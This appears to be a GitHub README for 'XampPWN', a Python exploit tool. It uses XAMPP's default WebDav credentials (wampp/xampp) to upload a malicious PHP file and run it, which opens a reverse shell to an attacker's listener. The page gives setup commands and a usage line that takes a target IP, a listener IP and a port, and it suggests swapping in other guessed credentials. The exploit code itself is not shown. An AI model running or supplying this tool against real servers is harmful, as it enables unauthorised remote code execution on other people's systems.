Skip to content

XAMPP WebDav File Upload Exploitation. Creates a payload that gets stored on the server and then executed to call back and start a reverse shell against the target.

Notifications You must be signed in to change notification settings

heartburn-dev/XampPWN-WebDav-File-Upload-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

Xampp WebDav File Upload Exploitation to Reverse Shelll

Versions 1.7.3 and earlier (Some later versions have this manually installed aswell) XAMPP comes shipped with WebDav (Web Distribution Authoring and Versioning) pre-installed and the default credentials set as wampp/xampp. This exploit sends a specially crafted malicious php file for Windows to the target and then executes it, resulting in a reverse shell being executed on a listener.


Installation

From within your Linux terminal, you can use the following command to download the program.

git clone https://github.com/0xskunk/XampPWN-WebDav-File-Upload-Exploit.git

We need to make sure you have the packages installed that the program requires before it will run.

First, install pip, which is a package manager for Python.

sudo apt install python3-pip

Then, we install the required libraries.

pip3 install colorama art requests urllib3

This is all the prerequisites you need!

Usage

XampPWN makes use of the ArgParse library, meaning you can get the help menu to appear by typing:

python3 XAMPPWN.py -h

And use the script like:

python3 XAMPPWN.py 10.10.10.10 192.16.10.1 443 

Make sure your positional arguments are in the order that the program requires when you run the exploit. Don't worry about adding http:// or https:// to the IP address - the program will add that for you if you haven't already.

Note: If the credentials are not wampp/xampp, it's easy enough to edit the script to what you believe they are. Just open it in any text editor and in the init constructor change the username and password!

Credits

Special thanks to the following Githubs for the inspiration to write this script:


Logo created with LogoMakr

About

XAMPP WebDav File Upload Exploitation. Creates a payload that gets stored on the server and then executed to call back and start a reverse shell against the target.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages